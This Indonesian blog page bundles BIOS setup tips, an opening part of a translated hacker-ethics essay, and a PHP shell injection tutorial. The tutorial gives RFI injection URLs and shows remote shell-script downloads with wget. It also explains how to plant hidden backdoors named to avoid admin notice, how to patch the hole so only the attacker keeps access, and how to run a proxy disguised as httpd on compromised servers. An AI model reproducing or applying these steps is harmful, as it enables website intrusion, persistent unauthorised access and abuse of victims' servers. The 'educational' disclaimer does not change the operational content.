Utiliti Setup memiliki setting hardware yang berlimpah, mulai dari yang terlihat nyata, seperti setting waktu di clock PC, sampai yang tidak kelihatan, seperti jumlah “wait states” yang mengkoordinasi aliran data antara RAM dan CPU.

Pertama, Jangan Merusak

Ketika bekerja dengan utiliti Setup PC, gunakan petunjuk praktis yang sama diajarkan pada awal bedah otak: Bila Anda tidak tahu apa yang dilakukan sesuatu, jangan berurusan dengannya. Kecerobohan mengubah wait state atau setting lainnya dapat menurunkan kinerja atau bahkan menyebabkan sistem mengalami crash.

Jika Anda mengira Anda telah tanpa sengaja mengubah setting ketika sedang bekerja dengan utiliti Setup, segera berhenti dan mulailah dari awal lagi. Semua utiliti Setup memiliki pilihan menu yang memungkinkan Anda keluar tanpa menyimpan perubahan. Anda mungkin melihat pula pilihan untuk mengembalikan setting ke nilai defaultnya. Abaikan opsi ini: Bila vendor PC Anda telah melakukan fine-tune terhadap sistem, setting default si pembuat BIOS mungkin membuatnya menjadi tidak optimal.

Backup setting-setting Anda sebelum membuat perubahan. Bila batere yang menghidupi chip clock/calendar mati, setting-setting Anda mati bersamanya. Bila utiliti Setup Anda mempunyai opsi backup, gunakanlah. Jika tidak, catat setting di kertas — atau tekan key Print Screen untuk masing-masing layar di utiliti tersebut (tetapi ini tidak selalu berfungsi).

Apa yang Dicari

Sebelum mulai, baca sampai selesai user manual yang menyertai PC atau motherboard. Banyak manual menawarkan penjelasan singkat masing-masing setting. Setting bervariasi menurut manufaktur dan model, namun Anda seharusnya menemukan ini di hampir semua PC:

Optimalisasi dan kompatibilitas setting: Utiliti Setup sering berisi setting-setting untuk kinerja hardware. Kadang-kadang ini tidak diatur secara optimal di pabrik, utamanya pada PC yang dibuat berdasar pesanan atau generik. Scan seluruh program Setup. Setting modus AGP dan setting DMA merupakan kandidat utama untuk dioptimalisasi. Setting-setting ini juga berguna untuk troubleshooting hardware yang baru diinstall: Menonaktifkan atau menurunkan setting yang diberikan bisa memicu ketidak-kompatibelan kartu grafis, CD-ROM drive, atau peranti lain yang terjadi sebelumnya.

Setting harddisk: Anda akan menemukan tabel, biasanya pada halaman kedua atau Advanced dan dengan judul “IDE”, yang mendaftar semua parameter konfigurasi untuk EIDE harddisk yang secara langsung terkoneksi ke motherboard. (SCSI harddisk dan EIDE harddisk yang tidak punya kartu ekspansi akan menjalankan program konfigurasinya sendiri.) Sementara kebanyakan PC yang dibuat selama beberapa tahun terakhir dapat dengan mulus mendeteksi dan mengkonfigurasi harddisk baru, sebagian memerlukan instalasi manual. Baca your dokumentasi disk baru Anda mengenai prosedur tersebut dan gunakan opsi-opsi on-screen untuk membuat perubahan di tabel ini.

Floppy disk: Opsi ini memungkinkan Anda menyetel tipe floppy drive (3,5 inci, 1,44MB, sebagai contoh) yang telah Anda tetapkan sebagai drive A: atau B: Anda. Ini merupakan setting yang perlu diperiksa jika Anda mengalami problem floppy-drive. Sebagian utiliti Setup mempunyai setting sekuriti `Floppy Read only` tersendiri yang mencegah data Anda dituliskan ke floppy disk dan dihapus dari PC.

Urutan booting: Setting ini menentukan mana yang pertama kali dilihat PC ketika instruksi boot-up. Contoh: `A: kemudian C:`, `C: kemudian A:`, atau `C:, Zip drive`. Untuk booting dari CD-ROM drive, Zip, atau LS-120, Anda sepertinya harus mengubah setting ini.

Proteksi password: Bila ini diaktifkan, BIOS akan menanyakan password sebelum booting up. Sangat berhati-hatilah dengan yang satu ini: Bila melupakan password, Anda terpaksa mereset jumper motherboard atau mencopot batere CMOS, yang akan menyebabkan Anda kehilangan semua setting, atau Anda bahkan harus membeli motherboard baru.

Setting IRQ: Bila Anda butuh setting IRQ ekstra untuk hardware baru, Anda perlu membebaskan satu IRQ dengan menonaktifkan feature yang tidak digunakan, seperti port serial, port paralel, atau port USB.

Setting port paralel: Pilih modus yang paling cocok untuk hardware. Modus ECP atau EPP dapat sangat mempercepat printer dan peranti lain.

Kipas RPM dan temperatur CPU: Dua parameter kritis ini sebaiknya dicentang secara periodik untuk memastikan mereka berfungsi dengan benar.

Drive Kotor

Benah-benah di akhir minggu meninggalkan lapisan debu yang menutupi seluruh kantor, dan Anda kuaatir CD-RW drive Anda mungkin kotor. Bagaimana sebaiknya membersihkannya?

Mungkin sebaiknya tidak. Gosokan paling halus sekalipun dapat menghambat laser sensitif pada drive, jadi bila tidak rusak, jangan bersihkan. Bila kinerja menurun, atau bila drive Anda tidak mampu membaca medianya, coba beberapa semprotan yang diarahkan dengan baik dari kaleng semprotan udara. Pastikan menggunakan sedotan plastik yang menyertai kaleng. Dan jaga agar menyemprot pelan-pelan; desakan semprotan yang berlebihan dapat menyebabkan kondensasi yang menumpuk uap lembab pada interior drive.

Menghentikan Program Tua

Beberapa program software yang benar-benar tua hanya tidak sanggup berfungsi pada PC kecepatan tinggi sekarang ini. Jika Anda memiliki program kuno yang mengunci atau memunculkan pesan error setiap kali Anda hendak menjalankannya, cobalah CPUKiller; utiliti gratis dan mudah digunakan, yang memungkinkan Anda memperlambat PC sesedikit atau sebanyak Anda inginkan. Pergilah ke www.cpukiller.com untuk mendownloadnya.


Sumber : Ilmukomputer.com

ReadMore

Senin, 22 Februari 2010

Php shell Injection,Php Shell Backdooring,Patching

1.Php Shell Injection
- Landasan Teori

PHP Shell Injection ( Injeksi PHP ) itu afaan om?

PHP Shell Injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean. Tapi kalau orang kita biasa menyebutnya Nginjek Shell hehe… Yang saya maksud dengan PHP Shell Injection di sini adalah berbeda hal dengan PHP Injection. PHP Shell Injection yang akan saya bahas adalah tindak lanjut atau tahap eksploitasi selanjutnya dengan memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu pengeksploitasian sebuah target dengan media PHP Shell. Perhatikan perbedaannya :
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:

http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://xXx.co.cc/xXx/r00t


Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.


PHP Shell Injection-nya :
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]

Remote File Inclusion (RFI), memasukan file yang berisi script PHP dari luar ke dalam target dengan memanfaatkan kesalahan statemen pengkodean PHP pada file di dalam target yang tidak terfilter dengan baik, misalnya bug ini :

require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :
http://www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=[injekan??]

- Saatnya Beraksi!
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

Nah dari url yang dikeluarkan oleh bot scan tersebut, kamu ambil/copy sampai ke tanda ’=’ (sama dengan) seperti pada gambar di atas (tulisan evil code-nya dibuang), lalu tambahkan di belakangnya (tanpa spasi) script PHP Shell yang mau dipakai untuk injeksi (PHP Shell Injector) dan diakhiri dengan tanda tanya ( ? ).

Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe

Oke kalo yang belum punya coba aja masuk ke irc server indoirc disana banyak yg scan minta aja kali dikasih, Kalau udah dapat semuanya, misalnya seperti ini :

- Target tadi:

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

- PHP Shell Injector:

http://geocities.com/gara_013/injek.txt???

Sekarang gabungkan keduanya jadi seperti ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!

Wew, yang ditampilkan di atas itu apa namanya sih?? Lalu apa gunanya?? Yang di atas itulah yang namanya shell. Shell adalah sebuah interface agar user dapat berkomunikasi dengan sistem komputer. Komunikasi yang terjadi yaitu user dapat mengetikan/menginput perintah-perintah khusus pada shell yang akan diterjemahkan pada komputer untuk dikerjakan.
Hanya saja shell seperti di atas sifatnya masih hanya remote dari luar server dan kalau celah keamanannya telah diketahui oleh adminnya dan ditutup, maka kamu nggak bisa lagi mengaksesnya.

Yahhh… ngapain juga repot-repot injek-injekan PHP segala kalo shell-nya gak tahan lama..!!!
Wew, tenang.. tenang… bisa kita akalin biar lebih awet. Segala permasalahan pasti ada pemecahannya. Pada tahap inilah kita harus melakukan apa yang orang Arab bilang PHP SHELL BACKDOORING.

2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)
- Landasan Teori

Backdoor itu apa sih om?
Backdoor adalah sebuah program ataupun hasil pengkodean yang memungkinkan seseorang dapat mengakses secara remote komputer korban (tempat backdoor ditanam). Bisa disebut juga sebagai ’jalan belakang’ untuk masuk ke komputer korban tanpa harus melalui form login.
Jadi dengan backdoor, kita tidak lagi mengakses shell di target dari luar (PHP Injection) melalui vulnerability lain seperti pada awal tutorial ini. Kita akan dapat mengakses komputer korban sekalipun celah keamanan tadi pun telah ditutup oleh adminnya. Nah, dalam tutor ini backdoor yang kita gunakan adalah PHP Shell backdoor. Backdoor ini adalah PHP Shell Injector itu sendiri (gampang kan?). Kalau bisa biasakanlah memakai backdoor yang berupa PHP Shell sederhana saja, jangan yang berat dan kompleks sejenis C99 dan R57, karena sangat mudah bagi admin target untuk menemukannya. Logikanya begini, kalau orang lain (bukan admin) saja bisa menemukan dengan mudah backdoor C99 atau R57 melalui google, apalagi admin target itu sendiri kan? Dan biasakan juga menanam lebih dari satu backdoor di tempat yang berbeda-beda pada sebuah target, dengan begitu apabila satu backdoor dihapus oleh admin, masih ada backdoor lain yang belum tentu ketahuan.

- Saatnya Beraksi!

Pertama-tama kamu cari dulu directory yang mempunyai Permission 777 (Direktori yang dapat diakses/dibaca, dapat diubah/diedit, dapat dieksekusi) atau perizinan direktorinya drwx rwx rwx. (Readable, Writeable, eXecutable untuk semua group). Caranya dengan mengeksekusi perintah :

find –perm –d /777

Namun, PHP backdoor ini tidak hanya membutuhkan direktori 777, tapi juga harus direktori yang sifatnya public, artinya direktori yang dapat diakses langsung lewat browser oleh semua orang. Ciri-ciri dari direktori ini yaitu pada path direktorinya ada tulisan seperti www, httdoc, httpd, html, public_html atau lain sebagainya. (Kalau emang public, dapat dites nantinya saat backdoor sudah terpasang). Coba liat hasil setelah menjalankan perintah di atas :
Setelah mendapatkan direktori tersebut misalnya salah satu direktori 777 yaitu /var/www/intruder/forum/db seperti di atas, langsung aja masuk/pindah ke direktori tersebut dengan mengeksekusi perintah ini :
cd /var/www/intruder/forum/db atau secara manual ketik aja di line direktori
Kalau sudah, sekarang tinggal mendownload/transfer file backdoor (PHP Injector tadi) ke dalam target. Caranya seperti biasa menggunakan wget atau lwp-download seperti ini :
wget http://h1.ripway/newbe/kambe.txt kalo gak bisa coba lwp-download
Jika perintah itu sukses, maka lanjutkan dengan mengubah file PHP Shell tersebut, dalam hal ini kambe.txt menjadi file berekstensi PHP dengan perintah ini :

mv kambe.txt.txt .system.php

Perintah tersebut akan mengubah file kambe.txt menjadi file hidden backdoor .system.php, dan seperti yang dijelaskan sebelumnya bahwa tanda titik di depan nama file tersebut menandakan/membuat file tersebut menjadi hidden. Dan sengaja diberinama .system.php biar gak terlalu mencurigakan. Kamu bisa lebih kreatif dengan membuat nama lain yang mirip dengan file-file yang ada di dalam direktori tersebut, jangan sampai terlihat perbedaan yang mencolok antara nama backdoor kamu dengan nama file-file lain di dalam target (Ninja Style).

Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee… tapi gimana mengakses backdoor tadi om???

Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :

- Liat direktori 777 tempat kamu menyimpan backdoor tadi :

/var/www/intruder/forum/db

- Nah itu artinya alamat (URL) backdoor tersebut adalah :

http://intruder.gmork.cz/forum//db/.system.php

Mengapa di antara forum dan db garis miringnya double sedangkan pada direktori yang ada pada shell hanya 1 garis miring saja? Untuk menentukannya dapat dilihat dari URL PHP Injection tadi yang menyatakan setelah direktori forum akan diikuti garis miring double untuk mengakses direktori di bawahnya. Coba perhatikan lagi :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Benar kan.. dua garis miring kan setelah forum. (Belajarlah mempertajam ketelitian dan analisa kamu)

Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :

PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.

3. PATCHING
- Landasan Teori

Patching itu afaan om?
Patching adalah suatu kegiatan untuk menutup celah keamanan (Vulnerability) dari sebuah website sehingga tidak bisa dieksploitasi lagi oleh siapa pun melaluinya.
Ada hikmah kebaikan dan keburukan dari proses patching yang akan kamu lakukan ini, yaitu :

1. Kebaikan : Kamu telah berhati mulia (weleh-weleh…) dengan menutup celah keamanan (kelemahan) sebuah website orang lain.

2. Keburukan : Kamu egois karena hanya ingin menguasai target sendiri saja. Yang lain jadi pada gak bisa masuk lagi deh lewat tuh celah keamanan. Hehehe…
Mari diambil hikmahnya….. yuuu…

- Saatnya Beraksi!

Patching yang kita lakukan terhadap RFI (Remote File Inclusion) Vulnerability ini akan lebih mudah jika dilakukan dengan PHP Shell Injector sejenis C99 yang mempunyai fitur untuk memanipulasi (editing) source file.
Syarat utama melakukan Patching ini yaitu celah keamanan harus berada pada direktori dengan permission 777 (Kecuali kalau kamu punya akses root, kamu bisa melakukan patching di direktori mana pun)
Ada tiga cara yang mungkin bisa kita lakukan untuk patching sebuah RFI Vulnerability, yaitu :

1. Memodifikasi file yang merupakan bug RFI

Coba kamu lakukan lagi PHP Injection dengan menggunakan PHP Shell Injector C99, misalnya seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Coba perhatikan gambar hasil PHP Shell Injection tersebut :

Nah, di situ akan terlihat perbedaan warna file yang merupakan bug RFI dari target yaitu warna kuning. Atau bisa dilihat dari url PHP Injection di atas tadi. Bug-nya adalah nama file paling belakang dan sebelum tanda tanya, yaitu file usercp_sendpasswd.php. Sekarang anda tinggal klik tulisan edit di ujung yang sebaris dengan file tersebut pada shell c99 (lihat gambar di atas) yang akan menampilkan isi atau source dari file tersebut, seperti ini :

Setelah itu carilah bagian yang serupa dengan tulisan di atas yang bertuliskan include($phpbb_root_path["user"], karena memang bagian ini lah yang bermasalah (bug RFI-nya) sehingga memungkinkan seorang attacker masuk melaluinya (liat lagi URL PHP Injection tadi). Kemudian lanjutkan dengan mengubah tulisan user di atas dengan nama lain misalnya menjadi seperti ini : include($phpbb_root_path["newbee"]. Setelah itu klik save untuk menyimpannya.
Sekarang coba tes melakukan PHP Injection lagi terhadap target seperti pada awal. Hasilnya mungkin akan seperti ini :

Itu berarti celah keamanan tadi telah berhasil dipatch! Pesan error yang muncul tidak mesti selalu sama seperti di atas, dapat juga berbeda-beda tergantung target dan celah keamanannya, bisa saja memunculkan pesan Fatal Error atau lainnya.

2. Ubah nama file tersebut

Cara kedua ini adalah cara yang paling mudah yaitu dengan mengubah nama file bug tersebut di atas dengan nama lain. Sebelum mengubah nama, ganti dulu permission file tersebut menjadi 777 agar bisa melakukan manipulasi terhadapnya, caranya:

chmod 777 usercp_sendpasswd.php

Setelah itu baru ubah nama file tersebut, misalnya dengan perintah ini :

mv usercp_sendpasswd.php newbee.php

Maka file bug tersebut akan berubah nama menjadi newbee.php sehingga URL PHP Injection hasil scan di atas tadi menjadi tidak valid lagi (berubah).

3. Hapus file tersebut

Cara ketiga ini juga mudah sekali sama halnya dengan cara kedua yaitu tinggal hapus aja file yang jadi bug RFI-nya. Beres kan? Gak ada lagi file yang bisa diinjeksi kalau file itu sendiri sudah tidak ada. Caranya seperti di atas, ubah dulu permission filenya menjadi 777 lalu tinggal eksekusi aja perintah ini : rm usercp_sendpasswd.php
Coba aja kamu tes lagi melakukan PHP Injection dari awal setelah kamu memakai cara kedua atau cara ketiga. Pasti hasilnya akan seperti atau mirp di bawah ini :

Itu berarti celah keamanan tadi telah ditutup, dan ingat! Jika kamu tidak memiliki akses root, maka kamu HANYA bisa melakukan patching seperti di atas apabila dalam kondisi file bug tersebut berada di direktori 777.
Sector Clear! Patching udah. Lalu gimana donk kita masuk lagi ke shell target kalau PHP Injection gak bisa lagi???
Lah, kan tadi kamu uda pasang backdoor. Masuk aja lewat situ… hehehe.. mulai paham kan algoritmanya? Gampang kan?
Tapi ada cara lain lagi untuk memasuki target tanpa menggunakan backdoor, yaitu dengan menggunakan PHP Shell Injection lagi, namun hanya bisa dilakukan jika kamu menggunakan cara pertama atau kedua saja :

1. Jika kamu melakukan patching dengan cara pertama, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[newbee]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan yang miring di atas, itu karena kamu telah mengubah tulisan user menjadi newbee pada cara pertama. (dan hanya kamu yang mengetahui path tersebut).

2. Jika kamu melakukan patching dengan cara kedua, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/newbee.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan miring di atas, itu terjadi karena kamu mengubah file usercp_sendpasswd.php menjadi newbee.php pada cara patching kedua.

Patching yang baik sebenarnya bukanlah dengan cara-cara di atas, tapi seorang admin harus membuat code program tambahan untuk memfilter suatu statemen inlcude seperti di atas misalnya saja dengan statemen switch, for, ataupun case agar file tersebut dapat berfungsi dengan seharusnya.

Sekarang minum lagi kopi susunya tadi, ntar keburu dingin loh. Nyante aja udah, kamu dah punya backdoor di sebuah website. Lalu ngapain lagi ya? Deface? Kayaknya gak perlu deh, kalau kamu deface tuh website sama aja ibaratnya kamu kirim surat ke rumah orang yang kamu susupi dan mengatakan ”Hey om! Aku dah pasang pintu rahasia di rumah kamu, jadi aku sekarang bebas berkeliaran di rumah kamu sekalipun kamu kunci semua pintu lainnya!!!”. Si admin tuh website yang tahu keberadaan kamu pasti menggunakan berbagai macam cara untuk mendeteksi backdoor yang kamu pasang tadi, ini tentu aja akan menambah peluang dalam memperpendek umur backdoor kamu yang amat sangat berguna itu.
Daripada melakukakan hal-hal seperti di atas, kamu bisa aja memanfaatkan website tersebut untuk hal-hal menarik lainnya, misalnya aja membuat website itu sebagai proxy server pribadi kamu.

4. CREATE PROXY
- Landasan Teori

Proxy itu apa om? Sejenis makanan ringan itu ya?
Bukan kaleee. Proxy itu adalah sebuah aplikasi yang menjadi media perantara antara kamu (sebagai client) dan ISP sebagai penyedia jasa internet. Sehingga IP address yang kamu pakai atau yang terkoneksi dengan website saat berinternet adalah ip address dari server proxy tersebut. Yang kamu perlu konfigurasikan hanyalah mengatur nama server proxy dan port-nya saja pada browser.

- Saatnya Bereaksi! Eh.. Beraksi!

1. Buka backdoor kamu tadi.
2. Transfer file kompresan proxy.tgz ke dalam target dengan perintah:

wget http://www.mith.com/db/osr/proxy.tgz

3. Dekompresi (extract) file tersebut :

tar -zxvf proxy.tgz

Hasilnya dekompresi tersebut berupa sebuah folder bernama pro

4. Masuk ke direktori tempat hasil dekompresi yaitu direktori pro tadi :

cd /var/www/intruder/forum/db/pro atau bisa kamu lakukan secara manual saja.
Isi dari folder pro tersebut adalah file xh dan prox

5. Atur port dan jalankan :

./xh -s “/usr/sbin/httpd” –d ./prox -a -d –p1234

Maksud perintah di atas adalah mengeksekusi file xh untuk membuat proses dengan nama palsu (fake process) yaitu /usr/sbin/httpd dan menjalankannya sebagai daemon/system (-d) atau berjalan di background untuk program proxy kamu tadi (prox) yang berjalan pada port 1234.
Yang perlu diingat cuman portnya itu kamu set 1234, terserah kalau kamu mau kasih port lain.

Kalau tidak ada pesan error, berarti semua berjalan lancar. Kalau kamu memakai proxy tersebut, tinggal masukan IP dan PORT proxy tersebut ke dalam settingan browser misalnya Mozilla seperti gambar di bawah ini :

IP proxy di atas adalah IP dari website target tadi. Bisa kamu cek di http://who.is
Setelah sudah disetting, baru cek lagi di http://who.is apakah berfungsi atau tidak. Dan lihat IP kamu di sana apakah sudah berubah mengikuti IP proxy tersebut.

Selamat… Proxy kamu aktif. Kalau tidak berhasil bisa saja terjadi karena ISP (Penyedia Layanan Internet) kamu tidak mengizinkan adanya akses yang menggunakan proxy melalui server mereka.

—————————— Potong di sini ————————————-

Selesai juga akhirnya… Piuuwwhh….
Tapi lega juga…ho ho ho

/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security khususnya cara melakukan penetration test terhadap website sendiri lalu melakukan patching sederhana dan cepat. Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini adalah bukan tanggung jawab saya. */

{

Maaf kalau tutorialnya masih berkualitas newbie dan masih ada salah di sana sini, namun kembali lagi mengutip dan memodifikasi kalimat dari om n0c0py (kemungkinan gay) :
”Lebih baik mempunyai sedikit ilmu tapi mau berbagi dengan yang lain daripada mempunyai banyak ilmu tapi hanya berdiam diri dan menyimpan untuk diri sendiri saja.”

ReadMore

Minggu, 21 Februari 2010

Cara Menjadi Seorang Hacker

Mengapa Dokumen Ini?Sebagai seorang editor dari Jargon File, seringkali saya mendapatkan email permohonan dari kalangan newbie yang antusias menanyakan (seperti) “Bagaimana saya bisa belajar menjadi seorang hacker yang handal?” Cukup aneh juga, karena mereka tidak melihat dan membaca berbagai FAQ atau dokumentasi web yang mengulas pertanyaan penting ini, jadi inilah masalah utamanya.Jika anda membaca cuplikan dokumen offline ini, versi onlinenya ada di http://www.ccil.org/~esr/faqs/hacker-howto.htmlApakah Hacker itu?Jargon File yang berisikan penjelasan istilah hacker yang terkait erat dengan keahlian teknis dan senang memecahkan masalah serta melampaui batasan yang ada.


Jika anda ingin tahu cara menjadi seorang hacker, hanya ada dua hal yang benar-benar relevan.Ada sebuah komunitas, budaya saling berbagi informasi, dari kaum programmer ahli dan pakar jaringan yang melalui sejarah saat pertama kali minicomputer diciptakan dan awal mula eksperimen ARPAnet. Para anggota budaya ini asal sebenarnya istilah ’hacker’. Hacker yang membangun internet, hacker menciptakan sistem operasi UNIX hingga hari ini. Hacker pula yang menjadikan World Wide Web bekerja. Jika anda merupakan bagian dari budaya ini, jika anda berkontribusi didalamnya dan mereka mengenal anda serta menyebut anda seorang hacker, maka anda memang benar seorang hacker.Pola pikir hacker tidak terbatas pada budaha software-hacker. Ada beberapa orang yang menerapkan sikap hacker tersebut pada hal lainnya, seperti elektronik atau musik – sebenarnya, disini anda dapat menemukan tingkat tertinggi dari ilmu pengetahuan atau seni. Sedangkan software hacker mengenal semangat juang ini dimanapun mereka berada dan menyebut diri mereka “hacker” juga – dan beberapa klaim bahwa dunia hacker tidak terbatas pada dimana mereka bekerja. Namun dalam dokumen ini kita hanya berfokus pada keahlian dan sikap para software hacker, dan tradisi saling berbagi yang mengawali istilah ‘hacker’.Adapula kelompok lain yang menyebut diri mereka hacker, namun sebenarnya tidak. Orang-orang ini (terutama dikalangan remaja) lyang melakukan kerusakan komputer dan membobol sistem telepon.
Para hacker yang sejati menyebut mereka sebagai ‘cracker’ dan tidak ada kaitannya dengan mereka. Hacker sejati menganggap cracker adalah pemalas, tidak bertanggung jawab dan pandai, dan kemampuan yang mereka miliki hanya untuk membobol sistem keamanan tidak lantas menjadi mereka hacker sebagaimana halnya jika anda mampu menjalankan mobil juga tidak lantas menjadikan anda seorang insinyur otomotif. Sayangnya, banyak sekali para jurnalis dan penulis yang salah dalam menggunakan kata ‘hacker’ untuk menggambarkan cracker; hal ini menodai citra hacker sejati.Perbedaan dasar antar hacker dan cracker: hacker membangun sesuatu, crackerlah yang merusaknya.Jika anda ingin menjadi seorang hacker, banyaklah membaca. Jika anda ingin menjadi seorang hacker, bacalah alt.2600 newsgroup dan bersiap-siaplah untuk melakukan 5 dari 10 perbuatan tercela setelah menyadari bahwa anda tidaklah secerdas yang anda kira. Dan itulah mengapa saya menggolongkan anda sebagai cracker.Sikap HackerHacker memecahkan masalah dan membangun sesuatu, dan mereka meyakini kebebasan dan saling membantu satu sama lainnya dengan sukarela.
Untuk diterima sebagai seorang hacker, anda harus berperilakuk seolah-olah hal itu merupakan sikap anda sendiri. Dan untuk berperilaku seakan-akan anda memiliki sikap tersebut, terlebih dahulu anda harus meyakini kebenaran sikap tersebut.Tapi jika anda mengira menerapkan sikap hacker merupakan suatu cara untuk diterima dalam budaya hacker tersebut, anda salah besar. Menjadi orang yang memiliki sikap hacker sangatlah penting bagi anda – untuk membantu anda belajar dan terus termotivasi. Sebagaimana halnya seni penciptaan, cara paling efektif untuk menjadi seorang master adalah berpikir dan bertindak bahwa anda benar-benar seorang master – tidak hanya secara intelektual namun juga secara emosional.Jadi, jika anda ingin menjadi seorang hacker, teruslah mengulang-ulang hal tersebut hingga anda benar-benar menjadi salah satu diantara mereka.1. Dunia yang penuh pesona masalah telah menunggu untuk diatasi.Menjadi seorang hacker sangatlah menyenangkan, namun jenis kesenangan yang diperoleh membutuhkan banyak usaha. Usaha yang memerlukan motivasi. Kesuksesan seorang atlet memerlukan motivasi akan bentuk fisik yang bagus, yang mendorong mereka mengatasi keterbatasan fisik mereka.Sama halnya, untuk menjadi seorang hacker anda perlu keterampilan dasar dalam memecahkan masalah, mempertajam kemampuan dan melatih kecerdasan anda tanpa henti.Jika anda jenis orang yang seperti itu secara alami, anda perlu memiliki tujuan untuk menjadi seorang hacker. Dengan kata lain anda memerlukan semangat hacking yang tidak dirusak dengan mengumbar nafsu seks, uang dan cemoohan masyarakat.(anda juga harus mengembangkan ketekunan dalam belajar – mempercaya bahwa meskipun anda tidak mengetahui semua yang anda perlukan dalam memecahkan masalah, jika anda hanya mampu mengungkap sebagian dan belajar dari hal itu, anda telah cukup belajar mengatasi masalah dibagian berikutnya – dan seterusnya, hingga anda benar-benar berhasil.)2. Tak seorangpun harus mengatasi masalah dua kaliPemikiran kreatif sangatlah berharga, sumber dayanya terbatas.
Tidak seharusnya mereka memboroskan waktu dengan masalah yang sama berulang-ulang disaat berbagai masalah baru telah menunggu diluar sana.Untuk berperilaku seperti seorang hacker, anda harus yakin bahwa waktu berpkir hacker lain sangatlah jitu – jadi nyaris merupakan tugas moral bagi anda untuk berbagi informasi, memecahkan masalah dan memberikan solusi lebih jauh agar hacker lainnya dapat mengatasi masalah yang baru ketimbang menghabiskan waktu pada masalah yang sama berulang-ulang.(Anda tidak perlu percaya bahwa anda harus memberikan seluruh produk kreatif anda, meski para hacker ada pula yang melakukannya untuk memperoleh respek dari hacker lainnya. Konsistensi nilai-nilai hacker untuk menjual produknya hanyalah sekedar untuk makan dan biaya sewa komputer. Konsistensi dalam menggunakan keahlian hacking anda untuk mendukung keluarga atau memperoleh kekayaan, tidak apa-apa sepanjang anda tidak lupa bahwa anda adalah seorang hacker.)3. Bosan dan kejenuhan adalah musuh utama.Kaum hakcer (dan orang-orang kreatif pada umumnya), semestinya tidak pernah menjadi bosan atau jenuh terhadap pekerjaan rutin, karena saat hal ini terjadi maksdunya mereka tidak melakukan apa yang mereka mampu lakukan – memecahkan masalah baru. Hal ini hanya akan menyakit perasaan setiap orang. Oleh karena itu bosan dan kejenuhan bukan hanya tidak diinginkan melainkan juga musuh utama.Untuk berperilakuk sebagai seorang hacker, anda harus percaya hal ini cukup untuk berada sejauh mungkin dari kebosanan, tidak hanya untuk diri anda sendiri namun juga bagi orang lain (khususnya hacker lainnya).(Terdapat beberapa pengecualian untuk hal ini.
Para hacker terkadang melakukan sesuatu yang tampaknya berulang-ulang atau membosankan untuk memperhatikan dan melatih kejernihan pikirannya, bertujuan untuk mempertajam kemampuan atau mendapatkan beberapa pengalaman tertentu yang tidak dimiliki oleh orang lain. Namun dengan pilihan ini – tak seorang pun bisa memperkirakan kapan mereka terperosok dalam kejenuhan.)4. Kebebasan adalah hal yang baik.Kaum hacker pada dasarnya anti-penguasa. Setiap orang yang mencekoki anda denga pemikiran ala penguasa, pada umumnya memiliki beberapa alasan tertentu untuk melakukannya pula. Jadi sikap sok berkuasa harus dilawan dimanapun anda berada, untuk mengurangi jeratan yang melilit anda dan para hacker lainnya.(Hal ini tidak berarti melawan seluruh penguasa.
